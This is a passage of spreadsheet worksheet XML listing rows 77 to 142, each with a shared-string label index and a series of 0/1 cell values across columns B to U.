      </c>
      <c r="U76" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="77" spans="1:21">
      <c r="A77" s="7" t="s">
        <v>80</v>
      </c>
      <c r="B77" s="1">
        <v>1</v>
      </c>
      <c r="C77" s="12">
        <v>0</v>
      </c>
      <c r="D77" s="9">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U77" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="78" spans="1:21" ht="24">
      <c r="A78" s="7" t="s">
        <v>81</v>
      </c>
      <c r="B78" s="1">
        <v>1</v>
      </c>
      <c r="C78" s="12">
        <v>0</v>
      </c>
      <c r="D78" s="9">
        <v>0</v>
      </c>
      <c r="E78" s="9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1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7">
        <v>0</v>
      </c>
      <c r="U78" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="79" spans="1:21" ht="24">
      <c r="A79" s="7" t="s">
        <v>82</v>
      </c>
      <c r="B79" s="1">
        <v>1</v>
      </c>
      <c r="C79" s="12">
        <v>1</v>
      </c>
      <c r="D79" s="9">
        <v>0</v>
      </c>
      <c r="E79" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U79" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="80" spans="1:21" ht="24">
      <c r="A80" s="7" t="s">
        <v>83</v>
      </c>
      <c r="B80" s="1">
        <v>0</v>
      </c>
      <c r="C80" s="12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7">
        <v>0</v>
      </c>
      <c r="U80" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="81" spans="1:21">
      <c r="A81" s="7" t="s">
        <v>84</v>
      </c>
      <c r="B81" s="1">
        <v>1</v>
      </c>
      <c r="C81" s="12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7">
        <v>0</v>
      </c>
      <c r="U81" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="82" spans="1:21">
      <c r="A82" s="7" t="s">
        <v>85</v>
      </c>
      <c r="B82" s="1">
        <v>0</v>
      </c>
      <c r="C82" s="12">
        <v>0</v>
      </c>
      <c r="D82" s="9">
        <v>0</v>
      </c>
      <c r="E82" s="9">
        <v>0</v>
      </c>
      <c r="F82" s="9">
        <v>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1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7">
        <v>0</v>
      </c>
      <c r="U82" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="83" spans="1:21" ht="24">
      <c r="A83" s="7" t="s">
        <v>86</v>
      </c>
      <c r="B83" s="1">
        <v>1</v>
      </c>
      <c r="C83" s="12">
        <v>1</v>
      </c>
      <c r="D83" s="9">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U83" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="84" spans="1:21">
      <c r="A84" s="7" t="s">
        <v>87</v>
      </c>
      <c r="B84" s="1">
        <v>1</v>
      </c>
      <c r="C84" s="12">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U84" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="85" spans="1:21" ht="24">
      <c r="A85" s="7" t="s">
        <v>88</v>
      </c>
      <c r="B85" s="1">
        <v>1</v>
      </c>
      <c r="C85" s="12">
        <v>0</v>
      </c>
      <c r="D85" s="9">
        <v>0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7">
        <v>1</v>
      </c>
      <c r="U85" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="86" spans="1:21">
      <c r="A86" s="7" t="s">
        <v>89</v>
      </c>
      <c r="B86" s="1">
        <v>1</v>
      </c>
      <c r="C86" s="12">
        <v>0</v>
      </c>
      <c r="D86" s="9">
        <v>0</v>
      </c>
      <c r="E86" s="9">
        <v>0</v>
      </c>
      <c r="F86" s="9">
        <v>1</v>
      </c>
      <c r="G86" s="9">
        <v>0</v>
      </c>
      <c r="H86" s="9">
        <v>1</v>
      </c>
      <c r="I86" s="9">
        <v>0</v>
      </c>
      <c r="J86" s="9">
        <v>0</v>
      </c>
      <c r="K86" s="9">
        <v>0</v>
      </c>
      <c r="L86" s="9">
        <v>0</v>
      </c>
      <c r="M86" s="1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7">
        <v>0</v>
      </c>
      <c r="U86" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="87" spans="1:21">
      <c r="A87" s="7" t="s">
        <v>90</v>
      </c>
      <c r="B87" s="1">
        <v>1</v>
      </c>
      <c r="C87" s="12">
        <v>0</v>
      </c>
      <c r="D87" s="9">
        <v>0</v>
      </c>
      <c r="E87" s="9">
        <v>0</v>
      </c>
      <c r="F87" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U87" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="88" spans="1:21">
      <c r="A88" s="7" t="s">
        <v>91</v>
      </c>
      <c r="B88" s="1">
        <v>1</v>
      </c>
      <c r="C88" s="12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7">
        <v>0</v>
      </c>
      <c r="U88" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="89" spans="1:21" ht="24">
      <c r="A89" s="7" t="s">
        <v>92</v>
      </c>
      <c r="B89" s="1">
        <v>1</v>
      </c>
      <c r="C89" s="12">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U89" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="90" spans="1:21" ht="36">
      <c r="A90" s="7" t="s">
        <v>93</v>
      </c>
      <c r="B90" s="1">
        <v>1</v>
      </c>
      <c r="C90" s="12">
        <v>1</v>
      </c>
      <c r="D90" s="9">
        <v>0</v>
      </c>
      <c r="E90" s="9">
        <v>1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  <c r="K90" s="9">
        <v>0</v>
      </c>
      <c r="L90" s="9">
        <v>0</v>
      </c>
      <c r="M90" s="1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1</v>
      </c>
      <c r="T90" s="17">
        <v>0</v>
      </c>
      <c r="U90" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="91" spans="1:21">
      <c r="A91" s="7" t="s">
        <v>94</v>
      </c>
      <c r="B91" s="1">
        <v>1</v>
      </c>
      <c r="C91" s="12">
        <v>0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7">
        <v>1</v>
      </c>
      <c r="U91" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="92" spans="1:21" ht="24">
      <c r="A92" s="7" t="s">
        <v>95</v>
      </c>
      <c r="B92" s="1">
        <v>0</v>
      </c>
      <c r="C92" s="12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7">
        <v>0</v>
      </c>
      <c r="U92" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="93" spans="1:21" ht="24">
      <c r="A93" s="7" t="s">
        <v>96</v>
      </c>
      <c r="B93" s="1">
        <v>1</v>
      </c>
      <c r="C93" s="12">
        <v>1</v>
      </c>
      <c r="D93" s="9">
        <v>0</v>
      </c>
      <c r="E93" s="9">
        <v>0</v>
      </c>
      <c r="F93" s="9">
        <v>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">
        <v>0</v>
      </c>
      <c r="N93" s="12">
        <v>0</v>
      </c>
      <c r="O93" s="12">
        <v>0</v>
      </c>
      <c r="P93" s="12">
        <v>0</v>
      </c>
      <c r="Q93" s="12">
        <v>1</v>
      </c>
      <c r="R93" s="12">
        <v>0</v>
      </c>
      <c r="S93" s="12">
        <v>0</v>
      </c>
      <c r="T93" s="17">
        <v>0</v>
      </c>
      <c r="U93" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="94" spans="1:21" ht="24">
      <c r="A94" s="7" t="s">
        <v>97</v>
      </c>
      <c r="B94" s="1">
        <v>1</v>
      </c>
      <c r="C94" s="12">
        <v>1</v>
      </c>
      <c r="D94" s="9">
        <v>0</v>
      </c>
      <c r="E94" s="9">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N94" s="12">
        <v>0</v>
      </c>
      <c r="O94" s="12">
        <v>0</v>
      </c>
      <c r="P94" s="12">
        <v>0</v>
      </c>
      <c r="Q94" s="12">
        <v>1</v>
      </c>
      <c r="R94" s="12">
        <v>0</v>
      </c>
      <c r="S94" s="12">
        <v>0</v>
      </c>
      <c r="T94" s="17">
        <v>0</v>
      </c>
      <c r="U94" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="95" spans="1:21">
      <c r="A95" s="7" t="s">
        <v>98</v>
      </c>
      <c r="B95" s="1">
        <v>1</v>
      </c>
      <c r="C95" s="12">
        <v>0</v>
      </c>
      <c r="D95" s="9">
        <v>0</v>
      </c>
      <c r="E95" s="9">
        <v>0</v>
      </c>
      <c r="F95" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U95" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="96" spans="1:21">
      <c r="A96" s="7" t="s">
        <v>99</v>
      </c>
      <c r="B96" s="1">
        <v>1</v>
      </c>
      <c r="C96" s="12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7">
        <v>0</v>
      </c>
      <c r="U96" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="97" spans="1:21" ht="36">
      <c r="A97" s="7" t="s">
        <v>100</v>
      </c>
      <c r="B97" s="1">
        <v>1</v>
      </c>
      <c r="C97" s="12">
        <v>0</v>
      </c>
      <c r="D97" s="9">
        <v>0</v>
      </c>
      <c r="E97" s="9">
        <v>1</v>
      </c>
      <c r="F97" s="9">
        <v>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1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7">
        <v>0</v>
      </c>
      <c r="U97" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="98" spans="1:21">
      <c r="A98" s="7" t="s">
        <v>101</v>
      </c>
      <c r="B98" s="1">
        <v>1</v>
      </c>
      <c r="C98" s="12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7">
        <v>0</v>
      </c>
      <c r="U98" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="99" spans="1:21">
      <c r="A99" s="7" t="s">
        <v>102</v>
      </c>
      <c r="B99" s="1">
        <v>0</v>
      </c>
      <c r="C99" s="12">
        <v>0</v>
      </c>
      <c r="D99" s="9">
        <v>0</v>
      </c>
      <c r="E99" s="9">
        <v>1</v>
      </c>
      <c r="F99" s="9">
        <v>1</v>
      </c>
      <c r="G99" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U99" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="100" spans="1:21">
      <c r="A100" s="7" t="s">
        <v>103</v>
      </c>
      <c r="B100" s="1">
        <v>0</v>
      </c>
      <c r="C100" s="12">
        <v>0</v>
      </c>
      <c r="D100" s="9">
        <v>0</v>
      </c>
      <c r="E100" s="9">
        <v>0</v>
      </c>
      <c r="F100" s="9">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U100" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="101" spans="1:21" ht="24">
      <c r="A101" s="7" t="s">
        <v>104</v>
      </c>
      <c r="B101" s="1">
        <v>0</v>
      </c>
      <c r="C101" s="12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7">
        <v>0</v>
      </c>
      <c r="U101" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="102" spans="1:21" ht="24">
      <c r="A102" s="7" t="s">
        <v>105</v>
      </c>
      <c r="B102" s="1">
        <v>1</v>
      </c>
      <c r="C102" s="12">
        <v>0</v>
      </c>
      <c r="D102" s="9">
        <v>0</v>
      </c>
      <c r="E102" s="9">
        <v>1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7">
        <v>1</v>
      </c>
      <c r="U102" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="103" spans="1:21">
      <c r="A103" s="7" t="s">
        <v>106</v>
      </c>
      <c r="B103" s="1">
        <v>1</v>
      </c>
      <c r="C103" s="12">
        <v>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1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7">
        <v>0</v>
      </c>
      <c r="U103" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="104" spans="1:21">
      <c r="A104" s="7" t="s">
        <v>107</v>
      </c>
      <c r="B104" s="1">
        <v>1</v>
      </c>
      <c r="C104" s="12">
        <v>0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7">
        <v>1</v>
      </c>
      <c r="U104" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="105" spans="1:21" ht="36">
      <c r="A105" s="7" t="s">
        <v>108</v>
      </c>
      <c r="B105" s="1">
        <v>1</v>
      </c>
      <c r="C105" s="12">
        <v>0</v>
      </c>
      <c r="D105" s="9">
        <v>0</v>
      </c>
      <c r="E105" s="9">
        <v>0</v>
      </c>
      <c r="F105" s="9">
        <v>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7">
        <v>0</v>
      </c>
      <c r="U105" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="106" spans="1:21">
      <c r="A106" s="7" t="s">
        <v>109</v>
      </c>
      <c r="B106" s="1">
        <v>0</v>
      </c>
      <c r="C106" s="12">
        <v>0</v>
      </c>
      <c r="D106" s="9">
        <v>0</v>
      </c>
      <c r="E106" s="9">
        <v>0</v>
      </c>
      <c r="F106" s="9">
        <v>1</v>
      </c>
      <c r="G106" s="9">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U106" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="107" spans="1:21" ht="24">
      <c r="A107" s="7" t="s">
        <v>110</v>
      </c>
      <c r="B107" s="1">
        <v>1</v>
      </c>
      <c r="C107" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U107" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="108" spans="1:21">
      <c r="A108" s="7" t="s">
        <v>111</v>
      </c>
      <c r="B108" s="1">
        <v>1</v>
      </c>
      <c r="C108" s="12">
        <v>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1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7">
        <v>1</v>
      </c>
      <c r="U108" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="109" spans="1:21">
      <c r="A109" s="7" t="s">
        <v>112</v>
      </c>
      <c r="B109" s="1">
        <v>1</v>
      </c>
      <c r="C109" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U109" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="110" spans="1:21">
      <c r="A110" s="7" t="s">
        <v>113</v>
      </c>
      <c r="B110" s="1">
        <v>0</v>
      </c>
      <c r="C110" s="12">
        <v>0</v>
      </c>
      <c r="D110" s="9">
        <v>0</v>
      </c>
      <c r="E110" s="9">
        <v>0</v>
      </c>
      <c r="F110" s="9">
        <v>1</v>
      </c>
      <c r="G110" s="9">
        <v>0</v>
      </c>
      <c r="H110" s="9">
        <v>0</v>
      </c>
      <c r="I110" s="9">
        <v>1</v>
      </c>
      <c r="J110" s="9">
        <v>0</v>
      </c>
      <c r="K110" s="9">
        <v>0</v>
      </c>
      <c r="L110" s="9">
        <v>0</v>
      </c>
      <c r="M110" s="1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7">
        <v>0</v>
      </c>
      <c r="U110" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="111" spans="1:21">
      <c r="A111" s="7" t="s">
        <v>114</v>
      </c>
      <c r="B111" s="1">
        <v>1</v>
      </c>
      <c r="C111" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U111" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="112" spans="1:21" ht="24">
      <c r="A112" s="7" t="s">
        <v>115</v>
      </c>
      <c r="B112" s="1">
        <v>1</v>
      </c>
      <c r="C112" s="12">
        <v>1</v>
      </c>
      <c r="D112" s="9">
        <v>0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1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1</v>
      </c>
      <c r="S112" s="12">
        <v>0</v>
      </c>
      <c r="T112" s="17">
        <v>0</v>
      </c>
      <c r="U112" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="113" spans="1:21" ht="24">
      <c r="A113" s="7" t="s">
        <v>116</v>
      </c>
      <c r="B113" s="1">
        <v>1</v>
      </c>
      <c r="C113" s="12">
        <v>0</v>
      </c>
      <c r="D113" s="9">
        <v>0</v>
      </c>
      <c r="E113" s="9">
        <v>0</v>
      </c>
      <c r="F113" s="9">
        <v>1</v>
      </c>
      <c r="G113" s="9">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U113" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="114" spans="1:21">
      <c r="A114" s="7" t="s">
        <v>117</v>
      </c>
      <c r="B114" s="1">
        <v>0</v>
      </c>
      <c r="C114" s="12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1</v>
      </c>
      <c r="J114" s="9">
        <v>0</v>
      </c>
      <c r="K114" s="9">
        <v>0</v>
      </c>
      <c r="L114" s="9">
        <v>0</v>
      </c>
      <c r="M114" s="1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7">
        <v>0</v>
      </c>
      <c r="U114" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="115" spans="1:21" ht="24">
      <c r="A115" s="7" t="s">
        <v>118</v>
      </c>
      <c r="B115" s="1">
        <v>1</v>
      </c>
      <c r="C115" s="12">
        <v>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7">
        <v>0</v>
      </c>
      <c r="U115" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="116" spans="1:21" ht="24">
      <c r="A116" s="7" t="s">
        <v>119</v>
      </c>
      <c r="B116" s="1">
        <v>1</v>
      </c>
      <c r="C116" s="12">
        <v>1</v>
      </c>
      <c r="D116" s="9">
        <v>0</v>
      </c>
      <c r="E116" s="9">
        <v>1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</v>
      </c>
      <c r="L116" s="9">
        <v>0</v>
      </c>
      <c r="M116" s="1">
        <v>0</v>
      </c>
      <c r="N116" s="12">
        <v>0</v>
      </c>
      <c r="O116" s="12">
        <v>0</v>
      </c>
      <c r="P116" s="12">
        <v>0</v>
      </c>
      <c r="Q116" s="12">
        <v>1</v>
      </c>
      <c r="R116" s="12">
        <v>0</v>
      </c>
      <c r="S116" s="12">
        <v>0</v>
      </c>
      <c r="T116" s="17">
        <v>0</v>
      </c>
      <c r="U116" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="117" spans="1:21" ht="36">
      <c r="A117" s="7" t="s">
        <v>120</v>
      </c>
      <c r="B117" s="1">
        <v>1</v>
      </c>
      <c r="C117" s="12">
        <v>1</v>
      </c>
      <c r="D117" s="9">
        <v>0</v>
      </c>
      <c r="E117" s="9">
        <v>1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</v>
      </c>
      <c r="L117" s="9">
        <v>0</v>
      </c>
      <c r="M117" s="1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1</v>
      </c>
      <c r="T117" s="17">
        <v>0</v>
      </c>
      <c r="U117" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="118" spans="1:21">
      <c r="A118" s="7" t="s">
        <v>121</v>
      </c>
      <c r="B118" s="1">
        <v>1</v>
      </c>
      <c r="C118" s="12">
        <v>0</v>
      </c>
      <c r="D118" s="9">
        <v>0</v>
      </c>
      <c r="E118" s="9">
        <v>0</v>
      </c>
      <c r="F118" s="9">
        <v>1</v>
      </c>
      <c r="G118" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U118" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="119" spans="1:21">
      <c r="A119" s="7" t="s">
        <v>122</v>
      </c>
      <c r="B119" s="1">
        <v>0</v>
      </c>
      <c r="C119" s="12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1</v>
      </c>
      <c r="L119" s="9">
        <v>0</v>
      </c>
      <c r="M119" s="1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7">
        <v>0</v>
      </c>
      <c r="U119" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="120" spans="1:21" ht="24">
      <c r="A120" s="7" t="s">
        <v>123</v>
      </c>
      <c r="B120" s="1">
        <v>1</v>
      </c>
      <c r="C120" s="12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7">
        <v>1</v>
      </c>
      <c r="U120" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="121" spans="1:21">
      <c r="A121" s="7" t="s">
        <v>124</v>
      </c>
      <c r="B121" s="1">
        <v>1</v>
      </c>
      <c r="C121" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U121" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="122" spans="1:21">
      <c r="A122" s="7" t="s">
        <v>125</v>
      </c>
      <c r="B122" s="1">
        <v>1</v>
      </c>
      <c r="C122" s="12">
        <v>0</v>
      </c>
      <c r="D122" s="9">
        <v>0</v>
      </c>
      <c r="E122" s="9">
        <v>0</v>
      </c>
      <c r="F122" s="9">
        <v>1</v>
      </c>
      <c r="G122" s="9">
        <v>0</v>
      </c>
      <c r="H122" s="9">
        <v>1</v>
      </c>
      <c r="I122" s="9">
        <v>0</v>
      </c>
      <c r="J122" s="9">
        <v>0</v>
      </c>
      <c r="K122" s="9">
        <v>0</v>
      </c>
      <c r="L122" s="9">
        <v>0</v>
      </c>
      <c r="M122" s="1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7">
        <v>0</v>
      </c>
      <c r="U122" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="123" spans="1:21" ht="24">
      <c r="A123" s="7" t="s">
        <v>126</v>
      </c>
      <c r="B123" s="1">
        <v>1</v>
      </c>
      <c r="C123" s="12">
        <v>1</v>
      </c>
      <c r="D123" s="9">
        <v>0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1">
        <v>0</v>
      </c>
      <c r="N123" s="12">
        <v>0</v>
      </c>
      <c r="O123" s="12">
        <v>0</v>
      </c>
      <c r="P123" s="12">
        <v>1</v>
      </c>
      <c r="Q123" s="12">
        <v>0</v>
      </c>
      <c r="R123" s="12">
        <v>0</v>
      </c>
      <c r="S123" s="12">
        <v>0</v>
      </c>
      <c r="T123" s="17">
        <v>0</v>
      </c>
      <c r="U123" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="124" spans="1:21" ht="24">
      <c r="A124" s="7" t="s">
        <v>127</v>
      </c>
      <c r="B124" s="1">
        <v>1</v>
      </c>
      <c r="C124" s="12">
        <v>1</v>
      </c>
      <c r="D124" s="9">
        <v>0</v>
      </c>
      <c r="E124" s="9">
        <v>1</v>
      </c>
      <c r="F124" s="9">
        <v>0</v>
      </c>
      <c r="G124" s="9">
        <v>0</v>
      </c>
      <c r="H124" s="9">
        <v>1</v>
      </c>
      <c r="I124" s="9">
        <v>0</v>
      </c>
      <c r="J124" s="9">
        <v>0</v>
      </c>
      <c r="K124" s="9">
        <v>0</v>
      </c>
      <c r="L124" s="9">
        <v>0</v>
      </c>
      <c r="M124" s="1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1</v>
      </c>
      <c r="T124" s="17">
        <v>0</v>
      </c>
      <c r="U124" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="125" spans="1:21">
      <c r="A125" s="7" t="s">
        <v>128</v>
      </c>
      <c r="B125" s="1">
        <v>0</v>
      </c>
      <c r="C125" s="12">
        <v>0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1</v>
      </c>
      <c r="M125" s="1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7">
        <v>0</v>
      </c>
      <c r="U125" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="126" spans="1:21">
      <c r="A126" s="7" t="s">
        <v>129</v>
      </c>
      <c r="B126" s="1">
        <v>1</v>
      </c>
      <c r="C126" s="12">
        <v>0</v>
      </c>
      <c r="D126" s="9">
        <v>0</v>
      </c>
      <c r="E126" s="9">
        <v>0</v>
      </c>
      <c r="F126" s="9">
        <v>1</v>
      </c>
      <c r="G126" s="9">
        <v>0</v>
      </c>
      <c r="H126" s="9">
        <v>1</v>
      </c>
      <c r="I126" s="9">
        <v>0</v>
      </c>
      <c r="J126" s="9">
        <v>0</v>
      </c>
      <c r="K126" s="9">
        <v>0</v>
      </c>
      <c r="L126" s="9">
        <v>0</v>
      </c>
      <c r="M126" s="1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7">
        <v>0</v>
      </c>
      <c r="U126" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="127" spans="1:21" ht="36">
      <c r="A127" s="7" t="s">
        <v>130</v>
      </c>
      <c r="B127" s="1">
        <v>1</v>
      </c>
      <c r="C127" s="12">
        <v>1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1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1</v>
      </c>
      <c r="S127" s="12">
        <v>0</v>
      </c>
      <c r="T127" s="17">
        <v>0</v>
      </c>
      <c r="U127" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="128" spans="1:21">
      <c r="A128" s="7" t="s">
        <v>131</v>
      </c>
      <c r="B128" s="1">
        <v>0</v>
      </c>
      <c r="C128" s="12">
        <v>0</v>
      </c>
      <c r="D128" s="9">
        <v>0</v>
      </c>
      <c r="E128" s="9">
        <v>0</v>
      </c>
      <c r="F128" s="9">
        <v>1</v>
      </c>
      <c r="G128" s="9">
        <v>0</v>
      </c>
      <c r="H128" s="9">
        <v>0</v>
      </c>
      <c r="I128" s="9">
        <v>1</v>
      </c>
      <c r="J128" s="9">
        <v>0</v>
      </c>
      <c r="K128" s="9">
        <v>0</v>
      </c>
      <c r="L128" s="9">
        <v>0</v>
      </c>
      <c r="M128" s="1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7">
        <v>0</v>
      </c>
      <c r="U128" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="129" spans="1:21" ht="36">
      <c r="A129" s="7" t="s">
        <v>132</v>
      </c>
      <c r="B129" s="1">
        <v>1</v>
      </c>
      <c r="C129" s="12">
        <v>0</v>
      </c>
      <c r="D129" s="9">
        <v>0</v>
      </c>
      <c r="E129" s="9">
        <v>0</v>
      </c>
      <c r="F129" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U129" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="130" spans="1:21" ht="24">
      <c r="A130" s="7" t="s">
        <v>133</v>
      </c>
      <c r="B130" s="1">
        <v>1</v>
      </c>
      <c r="C130" s="12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7">
        <v>0</v>
      </c>
      <c r="U130" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="131" spans="1:21" ht="24">
      <c r="A131" s="7" t="s">
        <v>134</v>
      </c>
      <c r="B131" s="1">
        <v>0</v>
      </c>
      <c r="C131" s="12">
        <v>0</v>
      </c>
      <c r="D131" s="9">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U131" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="132" spans="1:21" ht="24">
      <c r="A132" s="7" t="s">
        <v>135</v>
      </c>
      <c r="B132" s="1">
        <v>1</v>
      </c>
      <c r="C132" s="12">
        <v>0</v>
      </c>
      <c r="D132" s="9">
        <v>0</v>
      </c>
      <c r="E132" s="9">
        <v>1</v>
      </c>
      <c r="F132" s="9">
        <v>1</v>
      </c>
      <c r="G132" s="9">
        <v>0</v>
      </c>
      <c r="H132" s="9">
        <v>1</v>
      </c>
      <c r="I132" s="9">
        <v>0</v>
      </c>
      <c r="J132" s="9">
        <v>0</v>
      </c>
      <c r="K132" s="9">
        <v>0</v>
      </c>
      <c r="L132" s="9">
        <v>0</v>
      </c>
      <c r="M132" s="1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7">
        <v>0</v>
      </c>
      <c r="U132" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="133" spans="1:21" ht="24">
      <c r="A133" s="7" t="s">
        <v>136</v>
      </c>
      <c r="B133" s="1">
        <v>0</v>
      </c>
      <c r="C133" s="12">
        <v>0</v>
      </c>
      <c r="D133" s="9">
        <v>0</v>
      </c>
      <c r="E133" s="9">
        <v>1</v>
      </c>
      <c r="F133" s="9">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U133" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="134" spans="1:21" ht="24">
      <c r="A134" s="7" t="s">
        <v>137</v>
      </c>
      <c r="B134" s="1">
        <v>1</v>
      </c>
      <c r="C134" s="12">
        <v>0</v>
      </c>
      <c r="D134" s="9">
        <v>0</v>
      </c>
      <c r="E134" s="9">
        <v>0</v>
      </c>
      <c r="F134" s="9">
        <v>1</v>
      </c>
      <c r="G134" s="9">
        <v>0</v>
      </c>
      <c r="H134" s="9">
        <v>1</v>
      </c>
      <c r="I134" s="9">
        <v>0</v>
      </c>
      <c r="J134" s="9">
        <v>0</v>
      </c>
      <c r="K134" s="9">
        <v>0</v>
      </c>
      <c r="L134" s="9">
        <v>0</v>
      </c>
      <c r="M134" s="1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7">
        <v>0</v>
      </c>
      <c r="U134" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="135" spans="1:21" ht="24">
      <c r="A135" s="7" t="s">
        <v>138</v>
      </c>
      <c r="B135" s="1">
        <v>1</v>
      </c>
      <c r="C135" s="12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1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7">
        <v>1</v>
      </c>
      <c r="U135" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="136" spans="1:21" ht="24">
      <c r="A136" s="7" t="s">
        <v>139</v>
      </c>
      <c r="B136" s="1">
        <v>0</v>
      </c>
      <c r="C136" s="12">
        <v>0</v>
      </c>
      <c r="D136" s="9">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U136" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="137" spans="1:21">
      <c r="A137" s="7" t="s">
        <v>140</v>
      </c>
      <c r="B137" s="1">
        <v>1</v>
      </c>
      <c r="C137" s="12">
        <v>0</v>
      </c>
      <c r="D137" s="9">
        <v>0</v>
      </c>
      <c r="E137" s="9">
        <v>0</v>
      </c>
      <c r="F137" s="9">
        <v>1</v>
      </c>
      <c r="G137" s="9">
        <v>0</v>
      </c>
      <c r="H137" s="9">
        <v>1</v>
      </c>
      <c r="I137" s="9">
        <v>0</v>
      </c>
      <c r="J137" s="9">
        <v>1</v>
      </c>
      <c r="K137" s="9">
        <v>0</v>
      </c>
      <c r="L137" s="9">
        <v>0</v>
      </c>
      <c r="M137" s="1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7">
        <v>0</v>
      </c>
      <c r="U137" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="138" spans="1:21" ht="24">
      <c r="A138" s="7" t="s">
        <v>141</v>
      </c>
      <c r="B138" s="1">
        <v>1</v>
      </c>
      <c r="C138" s="12">
        <v>1</v>
      </c>
      <c r="D138" s="9">
        <v>0</v>
      </c>
      <c r="E138" s="9">
        <v>1</v>
      </c>
      <c r="F138" s="9">
        <v>1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</v>
      </c>
      <c r="M138" s="1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7">
        <v>0</v>
      </c>
      <c r="U138" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="139" spans="1:21" ht="24">
      <c r="A139" s="7" t="s">
        <v>142</v>
      </c>
      <c r="B139" s="1">
        <v>0</v>
      </c>
      <c r="C139" s="12">
        <v>0</v>
      </c>
      <c r="D139" s="9">
        <v>0</v>
      </c>
      <c r="E139" s="9">
        <v>1</v>
      </c>
      <c r="F139" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U139" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="140" spans="1:21" ht="24">
      <c r="A140" s="7" t="s">
        <v>143</v>
      </c>
      <c r="B140" s="1">
        <v>1</v>
      </c>
      <c r="C140" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U140" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="141" spans="1:21" ht="24">
      <c r="A141" s="7" t="s">
        <v>144</v>
      </c>
      <c r="B141" s="1">
        <v>1</v>
      </c>
      <c r="C141" s="12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1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7">
        <v>1</v>
      </c>
      <c r="U141" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="142" spans="1:21" ht="24">
      <c r="A142" s="7" t="s">
        <v>145</v>
      </c>
      <c r="B142" s="1">
        <v>1</v>
      </c>
      <c r="C142" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U142" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="143" spans="1:21">
      <c r="A143" s="7" t="s">
